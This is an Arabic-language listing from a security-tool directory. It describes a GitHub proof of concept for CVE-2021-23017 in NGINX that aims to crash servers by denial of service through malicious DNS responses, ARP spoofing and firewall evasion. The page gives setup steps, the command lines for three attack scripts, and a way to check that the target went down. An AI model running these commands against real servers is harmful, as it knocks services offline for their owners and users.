Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EVIL-CVE-2021-23017-Update-2025 — ثغرة في خوادم NGINX (الإصدارات 0.6.18–1.20.0). تهدف النصوص البرمجية إلى التسبب في حرمان من الخدمة (DoS) عن طريق إرسال استجابات DNS خبيثة، مع تحسينات لتجاوز جدران الحماية. | Kitploit
أدوات/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقتحليل DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

ثغرة في خوادم NGINX (الإصدارات 0.6.18–1.20.0). تهدف النصوص البرمجية إلى التسبب في حرمان من الخدمة (DoS) عن طريق إرسال استجابات DNS خبيثة، مع تحسينات لتجاوز جدران الحماية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ 11 أشهرلم تتم المراجعة بعد

ثغرة أمنية في خوادم NGINX (الإصدارات 0.6.18–1.20.0). تهدف النصوص البرمجية إلى التسبب في حرمان من الخدمة (DoS) عن طريق إرسال استجابات DNS ضارة، مع تحسينات لتجاوز جدران الحماية. هذه نسخة محسّنة من الإثبات الأصلي للمفهوم (PoC) من M507/CVE-2021-23017-PoC.

تحذير: يُستخدم فقط بإذن كتابي صريح من مالك النظام. الاختبار غير المصرح به غير قانوني.

المتطلبات

  • البيئة: لينكس (مثل Kali Linux، عبر Termux/إعداد ظاهري).
  • التبعيات:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • الشبكة: نفس الشبكة الفرعية للهدف لتزوير ARP، أو يجب أن يستخدم خادم NGINX الهدف عنوان IP لخادم DNS الخاص بك.

التثبيت

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. إعداد dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    أضف:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    ابدأ:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

ما يفعله

  • يرسل استجابات DNS ضارة باسم نطاق طويل (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) لتعطيل خادم NGINX.
  • يُحفز استعلامات DNS باستخدام curl وdig لاستغلال الثغرة الأمنية.
  • يتجاوز جدران الحماية عن طريق إرسال حزم DNS مباشرة واستخدام عمليات متوازية.

الاختلافات عن النسخة الأصلية

مقارنة بـ M507/CVE-2021-23017-PoC:

  • تحسين تجاوز جدار الحماية: يستخدم عمليات متوازية في poc1.2.3.py للاستشعار المتزامن، وإرسال DNS، وتشغيل الاستعلامات، ويجب تشغيلهم معًا.
  • تحسين تسليم الحزم: تردد أعلى للحزم والاستعلامات لتجاوز مرشحات جدار الحماية.
  • فحص الشبكة الفرعية: يتحقق من توافق الشبكة لتزوير ARP، مما يحسن الموثوقية.

الاستخدام

قم بتشغيل الثلاثة معًا وقم بتشغيلهم مع الوسائط المناسبة (استبدل <target_ip> و <your_dns_server_ip> و <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • يستشعر ويستجيب لاستعلامات DNS.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • يضيف إرسال DNS مباشر وتشغيل الاستعلامات.

poc3.py (موصى به)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • يشغل المهام بالتوازي لتحقيق أقصى كفاءة.

مثال

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

التحقق من النتائج

  • تحقق من حالة الخادم:

    root@kitploit:~
    curl -I http://<target_url>
    
    • النجاح: 502 Bad Gateway أو 503 Service Unavailable يشير إلى تعطل الخادم.
    • الفشل: 200 OK يشير إلى عدم وجود ثغرة أو حظر من جدار الحماية.
  • مراقبة حركة مرور DNS:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

إخلاء مسؤولية: لأغراض تعليمية فقط. ليس المؤلفون مسؤولين عن سوء الاستخدام.

تنزيل الأداة